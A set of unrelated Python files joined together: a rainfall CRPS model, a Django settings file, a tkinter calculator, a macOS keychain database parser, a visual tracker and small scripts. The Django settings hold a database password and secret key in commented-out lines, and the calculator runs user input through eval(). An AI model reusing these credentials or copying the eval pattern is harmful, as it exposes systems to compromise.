out_img = cv2.applyColorMap(im_range.astype("uint8"), cv2.COLORMAP_JET)
return Image.fromarray(out_img)
def scale_images(input_folder, output_folder, filenames, new_side_size, depth2rgb):
total_images = len(filenames)
print "There are " + str(total_images) + " to scale"
if depth2rgb:
print "Will apply colorjet"
for item, file_line in enumerate(filenames):
rel_path = file_line.split()[0]
input_path = path.join(input_folder, rel_path)
output_path = path.join(output_folder, rel_path)
if(path.exists(output_path)):
continue
if depth2rgb:
image = convert_depth_image_to_jetrgb(input_path)
else:
image = Image.open(input_path, "r")
new_image = scale_image_keep_ratio(image, new_side_size)
folder_structure = path.dirname(output_path)
if not path.exists(folder_structure):
makedirs(folder_structure)
new_image.save(output_path)
if (item % 1000) == 0:
print str(item) + " out of " + str(total_images)
if __name__ == '__main__':
args = get_arguments()
with open(args.files_to_scale) as eval_file:
scale_images(args.input_folder, args.output_folder, eval_file.readlines(), args.square_side, args.depth2rgb) |
import csv
import numpy as np
import matplotlib.pyplot as plt
import math
import scipy.stats
from math import *
from scipy import interpolate
import scipy.signal
from scipy.integrate import simps
thresholds = np.arange(70)
def heaviside(actual):
return thresholds >= actual
def erfcc(x):
"""Complementary error function."""
z = abs(x)
t = 1. / (1. + 0.5*z)
r = t * exp(-z*z-1.26551223+t*(1.00002368+t*(.37409196+
t*(.09678418+t*(-.18628806+t*(.27886807+
t*(-1.13520398+t*(1.48851587+t*(-.82215223+
t*.17087277)))))))))
if (x >= 0.):
return r
else:
return 2. - r
def normcdf(x, mu, sigma):
t = x-mu;
y = 0.5*erfcc(-t/(sigma*sqrt(2.0)));
if y>1.0:
y = 1.0;
return y
def gauss(mean, l, v=1):
xs = np.arange(l)
return [normcdf(x, mean, v) for x in xs]
def calc_crps(predictions, actuals):
for i, v in enumerate(predictions):
if not is_cdf_valid(v):
print v
obscdf = np.array([heaviside(i) for i in actuals])
crps = np.mean(np.mean((predictions - obscdf) ** 2))
return crps
def step(center, length=70):
x = [1.]*length
for i in range(0, int(center)):
x[i]=0.
return np.array(x)
def sigmoid(center, length):
xs = np.arange(length)
return 1. / (1 + np.exp(-(xs - center)))
def cdfs(means):
cdfs = []
for estimated_mean_rr in means:
if estimated_mean_rr <= 0:
cdfs.append([1]*70)
elif estimated_mean_rr>70:
a = [0]*69
a.append(1)
cdfs.append(a)
else:
s = gauss(estimated_mean_rr, 70)
cdfs.append(s)
return cdfs
def parse_floats(row, col_ind):
return np.array(row[col_ind].split(' '), dtype='float')
def parse_rr(row, rr_ind, default=None):
if default:
a = parse_floats(row, rr_ind)
for i, v in enumerate(a):
if v<0 or v>1000:
a[i]=default
return a
else:
return parse_floats(row, rr_ind)
def split_radars(distances, times):
T = []
j=1
s=0
while j<len(distances):
if distances[j]!=distances[j-1] or times[j]>=times[j-1]:
T.append(range(s,j))
s = j
j+=1
T.append(range(s,j))
return T
def mean_without_zeros(a):
filtered = a[a!=0]
if len(filtered)==0:
return 0
return filtered.mean()
def clean_radar_q(w, filler=0):
clean = []
for x in w:
if x>=0 and x<=1:
clean.append(x)
else:
clean.append(filler)
return w
def hmdir(times, rr, w, x, d, ey, defaults):
valid_t = times[(rr>=0)&(rr<100)]
valid_r = rr[(rr>=0)&(rr<100)]
valid_r = valid_r
if len(valid_t)==0: return 0
if len(valid_t)<2: return valid_r[0]/60.
f = interpolate.interp1d(valid_t, valid_r)
ra = range(int(valid_t.min()), int(valid_t.max()+1))
tl = f(ra)
#plt.plot(tl)
k = 5
if len(tl)>=k:
tl = scipy.signal.savgol_filter(tl, k, 3)
#plt.plot(tl)
#plt.show()
est = sum(tl)/60.
return est
def hmdirs(times, rr, w, hts, distances, ey, defaults):
hour = [0.]*61
for i in range(1, len(times)):
for j in range(int(times[len(times)-i]), int(times[len(times)-i-1])):
v = rr[len(times)-i-1]
q = w[len(times)-i-1]
ht = hts[len(times)-i-1]
if v>=0 and v<100 and not ht in [6, 8]:
hour[j]=v
est = sum(hour)/60.
return est
def all_good_estimates(rr, distances, radar_indices, w, times, hts, ey, defaults, compos):
age = []
agd = []
for radar in radar_indices:
rain = rr[radar]
q = w[radar]
est = hmdir(times[radar], rr[radar], w[radar], hts[radar], distances[radar], ey, defaults)
age.append(est)
agd.append(distances[radar][0])
return age, agd
def mean(x, default=0):
if len(x)==0: return default
return np.mean(x)
def is_cdf_valid(case):
if case[0] < 0 or case[0] > 1:
return False
for i in xrange(1, len(case)):
if (case[i] - 1)>1e-3:
print case[i]-1.
return False
if (case[i-1] - case[i])>1e-3:
print case[i-1], case[i]
return False
return True
def avg_cdf(h):
h = np.reshape(h, (len(h), 70))
total = np.average(h, axis=0)
return total
def estimate_cdf(good):
cdf = None
if len(good)>0:
if np.mean(good)==0:
cdf = [1]*70
else:
h = []
for j, x in enumerate(good):
s = sigmoid(round(x), 70)
h.append(s)
total = avg_cdf(h)
cdf = total
else:
cdf = [1]*70
return cdf
def radar_features(rr, hts, w, d, waters, composites):
m = float(len(rr))
composite_neg_rate = len(composites[(composites!=-99900)&(composites<0)])/m
error_rate = len(rr[rr<0])/m
zero_rate = len(rr[rr==0])/m
oor_rate = len(rr[rr>2000])/m
rain_rate = len(rr[(rr>10)&(rr<=100)])/m
bad_q = len(w[w==0])/m
oor_q = len(w[w>1])/m
good_q = len(w[w==1])/m
ok_q = len(w[(w>0)&(w<1)])/m
distance = d[0]
ht0 = len(hts[hts==0])
ht1 = len(hts[hts==1])
ht2 = len(hts[hts==2])
ht3 = len(hts[hts==3])
ht4 = len(hts[hts==4])
ht5 = len(hts[hts==5])
ht6 = len(hts[hts==6])
ht7 = len(hts[hts==7])
ht8 = len(hts[hts==8])
ht9 = len(hts[hts==9])
ht13 = len(hts[hts==13])
ht14 = len(hts[hts==14])
return [composite_neg_rate, ht13/m, np.sqrt(ok_q), oor_q, ht6/m, ht2/m, m, -1]
#0.00895660879826
#0.00895629729627
#0.0089555104762
#0.00894224941284
#0.00893217139966
#0.00893150685717
#0.00892673459363
#0.00892397448774
#0.00892321039254
#0.00892310908378
#0.00892309486393
def data_set(file_name):
reader = csv.reader(open(file_name))
header = reader.next()
id_ind = header.index('Id')
rr1_ind = header.index('RR1')
rr2_ind = header.index('RR2')
rr3_ind = header.index('RR3')
time_ind = header.index('TimeToEnd')
rad_q_ind = header.index('RadarQualityIndex')
try:
expected_ind = header.index('Expected')
except ValueError:
# no label
expected_ind = -1
composite_ind = header.index('Composite')
distance_ind = header.index('DistanceToRadar')
hydro_type_ind = header.index('HydrometeorType')
water_ind = header.index('LogWaterVolume')
mwm_ind = header.index('MassWeightedMean')
y = []
ids = []
avgs = []
cX = []
for i, row in enumerate(reader):
ids.append(row[id_ind])
times = parse_floats(row, time_ind)
distances = parse_floats(row, distance_ind)
rr1 = parse_rr(row, rr1_ind)
rr2 = parse_rr(row, rr2_ind)
rr3 = np.fabs(parse_rr(row, rr3_ind))
w = parse_floats(row, rad_q_ind)
hidro_types = parse_floats(row, hydro_type_ind)
waters = parse_floats(row, water_ind)
mwms = parse_floats(row, mwm_ind)
composites = parse_floats(row, composite_ind)
if expected_ind >= 0:
ey = float(row[expected_ind])
y.append(ey)
else:
ey = -1
radar_indices = split_radars(distances, times)
rr1_estimates, rr1_d = all_good_estimates(rr1, distances, radar_indices, w, times, hidro_types, ey, [0.33, 33.31, 33.31], composites)
rr2_estimates, rr2_d = all_good_estimates(rr2, distances, radar_indices, w, times, hidro_types, ey, [1.51, 36.37, 81.17], composites)
rr3_estimates, rr3_d = all_good_estimates(rr3, distances, radar_indices, w, times, hidro_types, ey, [4.52, 38.60, 42.34], composites)
avgs.append([mean(rr1_estimates, -1), mean(rr2_estimates, -1), mean(rr3_estimates, -1)])
'''
radar_f = []
for radar in radar_indices:
rf = radar_features(rr1[radar], hidro_types[radar], w[radar], distances[radar], waters[radar], composites[radar])
radar_f.append(rf)
total = np.mean(radar_f, axis=0)
total[-1]=mean(rr1_estimates)
cX.append(total)
'''
if i % 10000 == 0:
print "Completed row %d" % i
return ids, np.array(avgs), np.array(y), np.array(cX)
def cap_mean(a):
rr = []
for x in a:
if x<0:
x=0
if x>70:
x=70
rr.append(x)
return np.mean(rr)
def as_labels(y):
labels = np.array([1]*len(y))
for i, yi in enumerate(y):
if yi == 0:
labels[i]=0
return labels
def split(X, y):
from sklearn.cross_validation import StratifiedShuffleSplit
labels = as_labels(y)
sss = StratifiedShuffleSplit(labels, 1, test_size=0.3)
for a, b in sss:
train_X = X[a]
val_X = X[b]
train_y = y[a]
val_y = y[b]
train_labels = labels[a]
val_labels = labels[b]
return train_X, train_y, val_X, val_y, train_labels, val_labels
#0.00904234862754
#0.00904150831178
#0.00904983861228
#0.00901613263585
#0.00900412724833
#0.00900165157547
#0.00900155415651
#0.00900142821889
#0.00899566077666
#0.00899140245563
#0.00899136162509
#0.00899121498571
#0.00898516450647
#0.00898631930177
#0.00898616252983 --
#0.00894938332555
#0.00894852729502
#0.00894846604764
#0.00894788853756
#0.00894671310461
#0.00894636668274
#0.00894535250385
#0.0089344109825
#0.00893531092568
#0.00898349408228
#0.00899329563108
#0.00896273995689
#0.00895327069295
#0.00895322370697
#0.00895317650512
#0.00893217139966
#0.00992382187229 -> 0.00971819
#0.00983595164706 -> 0.00962434
#0.00957061504447 -> 0.00924509
#0.00952959922595 -> 0.00918081
#0.0095278045182
#0.00945252983071
#0.0094347918118 -> 0.00900467
#0.00941938258085 -> 0.00893021
#0.00938841086168
#0.00923516814223
#0.00923510027563
#0.00922980704588 -> 0.00871121
#0.00922233467044
#0.0092045862579
#0.00920457357894 -> 0.00867324
#0.0092016208212
#0.00920147312222 -> 0.00867015
#0.00920130043796
#0.00919861298415
#0.00919647579626
#0.00919475970769
#0.00919475679584
#0.00916480687816 -> 0.00861711
#0.00915106704337
#0.00913163690433 -> 0.00855668
#0.00912739404781
#0.00912342542954
#0.00912337214931
#0.00912001249288 -> 0.00853307
#0.00910320309268 -> 0.00849574
#0.00907174536772 ***
#0.00907146849158 -> 0.00849297
#0.00907144426707 -> 0.00849229
#0.00910805136467 -> 0.00846733
#0.00908048569227 -> 0.00844376
#0.00907063607574
#0.00907063537653
#0.00904911201717 => 0.00842818
#0.00904491469844
#Baseline CRPS: 0.00965034244803
#1126695 training examples
#987398 0s
#133717 valid no 0
#5580 invalid
def fit_cdf(X, y):
ty = []
for yi in y:
if yi>70:
ty.append(70)
else:
ty.append(yi)
ty = np.array(ty)
n=70+2
m=70
models = []
for x in X.T:
q = scipy.stats.mstats.mquantiles(x[x>0.1], np.arange(0,n-1)/float(n-2))
breaks = np.concatenate(([-1, 0], q))
model = np.zeros((n,m))
for i in range(0, n):
d = ty[(x>breaks[i])&(x<=breaks[i+1])]
h, _ = np.histogram(d, bins=range(0, m+1) )
for j in range(1, len(h)):
h[j]+=h[j-1]
model[i]=h/float(h[-1])
models.append(model)
return models
def predict_cdf(X, models):
n=70+2
m=70
predictions = np.zeros((len(X), 70))
for j, x in enumerate(X.T):
q = scipy.stats.mstats.mquantiles(x[x>0.1], np.arange(0,n-1)/float(n-2))
breaks = np.concatenate(([-1, 0], q))
model = models[j]
for i in range(0, n):
predictions[(x>breaks[i])&(x<=breaks[i+1]),0:m]+=model[i]/float(len(X.T))
return predictions
def classification_features(cX, predictions):
a = []
for i in range(0, len(cX)):
b = []
b.extend(cX[i])
b.extend(predictions[i])
a.append(b)
return np.array(a)
_, X, y, cX= data_set('train_2013.csv')
model = fit_cdf(X, y)
predictions = predict_cdf(X, model)
print 'CRPS', calc_crps(predictions, y)
'''
cX = classification_features(cX, predictions)
from sklearn import svm
clf = svm.LinearSVC(verbose=3, dual=False)
from sklearn import linear_model
clf = linear_model.LogisticRegression(tol=1e-8, C=128)
#clf = svm.SVC(verbose=3, probability=True)
y_labels = as_labels(y)
clf.fit(cX, y_labels)
print 'Training Accuracy', clf.score(cX, y_labels)
from sklearn.metrics import classification_report
print classification_report(y_labels, clf.predict(cX))
X_l = clf.predict_proba(cX)
for i, l in enumerate(X_l):
if predictions[i][0] >0.95:
predictions[i]=(predictions[i]+1)/2
print 'CRPS: ', calc_crps(predictions, y)
'''
print 'Predicting for sumbission...'
print 'Loading test file...'
ids, X, y, cX= data_set('test_2014.csv')
predictions = predict_cdf(X, model)
'''
cX = classification_features(cX, predictions)
X_l = clf.predict_proba(cX)
for i, l in enumerate(X_l):
if l[0] >0.5:
predictions[i]=(predictions[i]+1)/2
'''
cdfs = predictions
print 'Writing submision file...'
writer = csv.writer(open('classifier-cdfavg-sub.csv', 'w'))
solution_header = ['Id']
solution_header.extend(['Predicted{0}'.format(t) for t in xrange(0, 70)])
writer.writerow(solution_header)
for i, id in enumerate(ids):
prediction = cdfs[i]
solution_row = [id]
solution_row.extend(prediction)
writer.writerow(solution_row)
if i % 10000 == 0:
print "Completed row %d" % i
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
'Django settings for labman2 project.'
DEBUG = True
TEMPLATE_DEBUG = DEBUG
#ALLOWED_HOSTS = ['127.0.0.1', 'localhost',]
import os
from os.path import join, abspath, dirname, sep
PROJECT_ROOT = abspath(join(dirname(__file__), "."))
def root(*x):
"Absolute path to a subdir of the project"
return abspath(join(PROJECT_ROOT, *x))
def get_env(var_name):
"Read an ENV variable, e.g. password"
try:
return os.environ[var_name]
except KeyError:
print("Environment variable '%s' is not set, cannot continue." %
var_name)
raise
ADMINS = [
# ('Your Name', 'your_email@example.com'),
]
ADMINS += (get_env("LABMAN2_ADMIN_NAME"), get_env("LABMAN2_ADMIN_EMAIL"))
MANAGERS = ADMINS
DATABASES = {
'default': {
#Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'labman2', # Or path to database file if using sqlite3.
'USER': 'www', # Not used with sqlite3.
# 'PASSWORD': 'Y5t2KUII', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
#'OPTIONS': {'autocommit': True}, # Needed for tests with psycopg2 v.2.4.2
}
}
DATABASES['default']['PASSWORD'] = get_env("LABMAN2_DB_PASSWD")
#New in Django 1.6.
#Default:False,
#ATOMIC_REQUESTS = True # wrap each HTTP request in a transaction
# on this database
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
#TIME_ZONE = 'America/Chicago'
#TIME_ZONE = None
TIME_ZONE = 'Europe/Helsinki'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
LANGUAGES = (
('en', (u'English')),
('fi', (u'Suomi')),
('ru', (u'Русский')),
# ('sv', (u'Svenska')),
)
#SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
#django 1.4
# If you set this to False, Django will not use timezone-aware datetimes.
#USE_TZ = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = root('uploads')
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = '/uploads/'
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
#for Svetlana
#STATIC_ROOT = 'C:/Users/Svetlana/labman2/labman2/static/'
#for Vova
STATIC_ROOT = root('static')
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
#STATIC_DOC_ROOT = '/home/chu/progs/labman2/labman2/static'
STATIC_DOC_ROOT = STATIC_ROOT
LOGIN_URL = '/accounts/login/'
#The URL where requests are redirected after login
LOGIN_REDIRECT_URL = '/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
#SECRET_KEY = 'qgpjbmj(vup)e5s4oy*-f(84o-04ck%pxvbpi3hj^w%%41%d@-'
SECRET_KEY = get_env("LABMAN2_SECRET_KEY")
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
#'django.middleware.transaction.TransactionMiddleware', is deprecated
#and replaced by ATOMIC_REQUESTS
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'labman2.urls'
# Python dotted path to the WSGI application used by Django's runserver.
WSGI_APPLICATION = 'labman2.wsgi.application'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or
# "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
SUBDIRS = [name[0].split(sep)[-1]
for name in os.walk(abspath(join("labman2", "data", "subdata")))
if name[0].split(sep)[-1] not in ('sql', 'subdata')]
# django-registration from
# http://www.bitbucket.org/ubernostrum/django-registration/
INSTALLED_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
# 'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.admin',
'django.contrib.admindocs',
# 'registration',
'labman2',
'labman2.data',
'labman2.data.subdata',
'allauth',
]
INSTALLED_APPS.extend(['labman2.data.subdata.%s' % name for name in SUBDIRS])
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
},
'console': {
# logging handler that outputs log messages to terminal
'class': 'logging.StreamHandler',
'level': 'DEBUG', # message level to be written to console
},
},
'loggers': {
'': {
'handlers': ['mail_admins', 'console'],
'level': 'DEBUG',
'propagate': True,
},
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
# Tests for registration need the following.
ACCOUNT_ACTIVATION_DAYS = 3
|
#CALCULATOR BY:GJAYZ
import sys
from tkinter import *
from tkinter import messagebox
#winDows
Calculator = Tk()
Calculator.geometry()
Calculator.title("Calculator By:Gjayz")
Calculator.configure()
#VARLABLE
text_Input = StringVar()
operator = ""
#FRAME CALCULATOR
Calculator_Function = Frame(Calculator, bg="plum4", bd=6, relief=GROOVE)
Calculator_Function.pack(side=BOTTOM)
#FUNCTION
def btnClick(NumbersCal):
global operator
operator = operator + str(NumbersCal)
text_Input.set(operator)
def btnClear():
global operator
operator = ""
text_Input.set("0")
def btnEquals():
global operator
sumup = str(eval(operator))
text_Input.set(sumup)
operator = ""
def Exit():
QExit = messagebox.askyesno("ARE U SURE", "Do you what to exit the system")
if QExit > 0:
sys.exit()
#ENTRY
txtDisplay = Entry(Calculator_Function, width=25, bg="white", bd=4, font=("arial",20,"bold"), justify=RIGHT, textvariable=text_Input)
txtDisplay.grid(row=0,column=0,columnspan=4,pady=1)
txtDisplay.insert(0,"0")
#CALCULATOR BUTTONS
b7=Button(Calculator_Function, padx=16, pady=1, bd=7, fg="snow", font=('arial', 12, 'bold'), width=3, text="7",bg="gray25",command=lambda:btnClick(7))
b7.grid(row=2,column=0)
b8=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="8",bg="gray25",command=lambda:btnClick(8))
b8.grid(row=2,column=1)
b9=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="9",bg="gray25",command=lambda:btnClick(9))
b9.grid(row=2,column=2)
bAdd=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="+",bg="gray25",command=lambda:btnClick('+'))
bAdd.grid(row=2,column=3)
#CALCULATOR BUTTONS
b4=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="4",bg="gray25",command=lambda:btnClick(4))
b4.grid(row=3,column=0)
b5=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="5",bg="gray25",command=lambda:btnClick(5))
b5.grid(row=3,column=1)
b6=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="6",bg="gray25",command=lambda:btnClick(6))
b6.grid(row=3,column=2)
bSub=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="-",bg="gray25",command=lambda:btnClick('-'))
bSub.grid(row=3,column=3)
#CALCULATOR BUTTONS
b1=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="1",bg="gray25",command=lambda:btnClick(1))
b1.grid(row=4,column=0)
b2=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="2",bg="gray25",command=lambda:btnClick(2))
b2.grid(row=4,column=1)
b3=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="3",bg="gray25",command=lambda:btnClick(3))
b3.grid(row=4,column=2)
bMulti=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="x",bg="gray25",command=lambda:btnClick('*'))
bMulti.grid(row=4,column=3)
#CALCULATOR BUTTONS
b0=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="0",bg="gray25",command=lambda:btnClick(0))
b0.grid(row=5,column=0)
bClear=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="C",bg="gray25",command=btnClear)
bClear.grid(row=5,column=1)
bEqual=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="=",bg="gray25",command=btnEquals)
bEqual.grid(row=5,column=2)
bDiv=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="/",bg="gray25",command=lambda:btnClick("/"))
bDiv.grid(row=5,column=3)
#CALCULATOR BUTTONS
bModulus=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="%",bg="gray25",command=lambda:btnClick('%'))
bModulus.grid(row=6,column=0)
bExpon=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="xx",bg="gray25",command=lambda:btnClick('**'))
bExpon.grid(row=6,column=1)
bFdivision=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="//",bg="gray25",command=lambda:btnClick('//'))
bFdivision.grid(row=6,column=2)
bExit=Button(Calculator_Function,padx=16,pady=1,bd=7,fg="snow", font=('arial', 12, 'bold'), width=3, text="Exit",bg="gray25",command=Exit)
bExit.grid(row=6,column=3)
#LOOPS
Calculator.mainloop()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Script to parse MacOS keychain database files."""
import argparse
import logging
import sys
from dtformats import keychain
from dtformats import output_writers
ATTRIBUTE_DATA_TYPES = {
0: 'String with size',
1: 'Integer 32-bit signed',
2: 'Integer 32-bit unsigned',
3: 'CSSM_DB_ATTRIBUTE_FORMAT_BIG_NUM',
4: 'Floating-point 64-bit',
5: 'Date and time',
6: 'Binary data',
7: 'CSSM_DB_ATTRIBUTE_FORMAT_MULTI_UINT32',
8: 'CSSM_DB_ATTRIBUTE_FORMAT_COMPLEX'}
def Main():
"""The main program function.
Returns:
bool: True if successful or False if not.
"""
argument_parser = argparse.ArgumentParser(description=(
'Extracts information from MacOS keychain database files.'))
argument_parser.add_argument(
'-c', '--content', dest='content', action='store_true', default=False,
help='export database content instead of schema.')
argument_parser.add_argument(
'-d', '--debug', dest='debug', action='store_true', default=False,
help='enable debug output.')
argument_parser.add_argument(
'source', nargs='?', action='store', metavar='PATH',
default=None, help='path of the keychain database file.')
options = argument_parser.parse_args()
if not options.source:
print('Source file missing.')
print('')
argument_parser.print_help()
print('')
return False
logging.basicConfig(
level=logging.INFO, format='[%(levelname)s] %(message)s')
output_writer = output_writers.StdoutWriter()
try:
output_writer.Open()
except IOError as exception:
print(f'Unable to open output writer with error: {exception!s}')
print('')
return False
keychain_file = keychain.KeychainDatabaseFile(
debug=options.debug, output_writer=output_writer)
keychain_file.Open(options.source)
if not options.content:
print('Keychain database file schema:')
for table in keychain_file.tables:
print((f'Table: {table.relation_name:s} '
f'(0x{table.relation_identifier:08x})'))
number_of_columns = len(table.columns)
print(f'\tNumber of columns:\t{number_of_columns:d}')
print('\tColumn\tIdentifier\tName\tType')
for index, column in enumerate(table.columns):
if column.attribute_identifier >= number_of_columns:
attribute_identifier = ''
else:
attribute_identifier = f'{column.attribute_identifier:d}'
attribute_data_type = ATTRIBUTE_DATA_TYPES.get(
column.attribute_data_type,
f'0x{column.attribute_data_type:08x}')
attribute_name = column.attribute_name or 'NULL'
print((f'\t{index:d}\t{attribute_identifier:s}\t{attribute_name:s}\t'
f'{attribute_data_type:s}'))
print('')
print('')
else:
for table in keychain_file.tables:
print((f'Table: {table.relation_name:s} '
f'(0x{table.relation_identifier:08x})'))
print('\t'.join([column.attribute_name for column in table.columns]))
for record in table.records:
record_values = []
for value in record.values():
if value is None:
record_values.append('NULL')
else:
record_values.append(f'{value!s}')
print('\t'.join(record_values))
print('')
keychain_file.Close()
output_writer.Close()
return True
if __name__ == '__main__':
if not Main():
sys.exit(1)
else:
sys.exit(0)
|
# # here we are going to define a list # #
# name = str(input("Enter your name : "))
#
# for i in range(len(name)):
# print("Your name {}. letter: {}".format(i, name[i]))
website1 = "www.google.com"
website2 = "www.istihza.com"
website3 = "www.facebook.com"
website4 = "www.guru99.com"
for names in website1, website2, website3, website4:
print("site: ", names[4:-4]) #dört karekter önden 4 karekter arkadan alınıp
print("----------------------------------")
#print("Önerilen site simleri ", names[:])
|
"""
Python re-implementation of "Learning Background-Aware Correlation Filters for Visual Tracking"
@article{Galoogahi2017Learning,
title={Learning Background-Aware Correlation Filters for Visual Tracking},
author={Galoogahi, Hamed Kiani and Fagg, Ashton and Lucey, Simon},
year={2017},
}
"""
import numpy as np
import cv2
from .base import BaseCF
from lib.utils import cos_window,gaussian2d_rolled_labels
from lib.fft_tools import fft2,ifft2
from .feature import extract_hog_feature
from .config.bacf_config import BACFConfig
class BACF(BaseCF):
def __init__(self, config=BACFConfig()):
super(BACF).__init__()
self.cell_size=config.cell_size
self.cell_selection_thresh=config.cell_selection_thresh
self.search_area_shape = config.search_area_shape
self.search_area_scale=config.search_area_scale
self.filter_max_area = config.filter_max_area
self.interp_factor=config.interp_factor
self.output_sigma_factor = config.output_sigma_factor
self.interpolate_response =config.interpolate_response
self.newton_iterations =config.newton_iterations
self.number_of_scales =config.number_of_scales
self.scale_step = config.scale_step
self.admm_iterations = config.admm_iterations
self.admm_lambda = config.admm_lambda
def init(self,first_frame,bbox):
bbox = np.array(bbox).astype(np.int64)
x, y, w, h = tuple(bbox)
self._center = (x + w / 2, y + h / 2)
self.w, self.h = w, h
self.feature_ratio=self.cell_size
self.search_area=(self.w/self.feature_ratio*self.search_area_scale)*\
(self.h/self.feature_ratio*self.search_area_scale)
if self.search_area<self.cell_selection_thresh*self.filter_max_area:
self.cell_size=int(min(self.feature_ratio,max(1,int(np.ceil(np.sqrt(
self.w*self.search_area_scale/(self.cell_selection_thresh*self.filter_max_area)*\
self.h*self.search_area_scale/(self.cell_selection_thresh*self.filter_max_area)
))))))
self.feature_ratio=self.cell_size
self.search_area = (self.w / self.feature_ratio * self.search_area_scale) * \
(self.h / self.feature_ratio * self.search_area_scale)
if self.search_area>self.filter_max_area:
self.current_scale_factor=np.sqrt(self.search_area/self.filter_max_area)
else:
self.current_scale_factor=1.
self.base_target_sz=(self.w/self.current_scale_factor,self.h/self.current_scale_factor)
self.target_sz=self.base_target_sz
if self.search_area_shape=='proportional':
self.crop_size=(int(self.base_target_sz[0]*self.search_area_scale),int(self.base_target_sz[1]*self.search_area_scale))
elif self.search_area_shape=='square':
w=int(np.sqrt(self.base_target_sz[0]*self.base_target_sz[1])*self.search_area_scale)
self.crop_size=(w,w)
elif self.search_area_shape=='fix_padding':
tmp=int(np.sqrt(self.base_target_sz[0]*self.search_area_scale+(self.base_target_sz[1]-self.base_target_sz[0])/4))+\
(self.base_target_sz[0]+self.base_target_sz[1])/2
self.crop_size=(self.base_target_sz[0]+tmp,self.base_target_sz[1]+tmp)
else:
raise ValueError
